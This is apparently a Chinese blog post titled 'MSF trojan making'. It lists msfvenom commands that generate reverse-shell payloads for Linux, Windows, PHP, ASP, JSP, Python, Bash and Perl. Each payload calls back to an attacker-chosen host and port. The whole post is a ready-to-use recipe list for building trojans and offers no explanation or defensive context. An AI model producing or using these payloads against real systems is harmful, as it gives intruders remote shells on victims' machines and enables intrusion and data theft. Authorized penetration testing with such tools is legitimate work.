【网安神器】MSF木马制作

发布时间 2023-11-25 17:35:11作者: ExpiredSaury

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=Your IP LPORT=Your Port -f elf  -o ./shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Your IP LPORT= Your Port -f exe -o ./shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw -o ./shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Your IP LPORT=Your Port -f asp -o ./shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw -o ./shell.jsp

Python

msfvenom -p cmd/unix/reverse_python LHOST=Your IP LPORT= Your Port -f raw -o ./shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=Your IP LPORT= Your Port -f raw -o ./shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=Your IP LPORT= Your Port -f raw -o ./shell.pl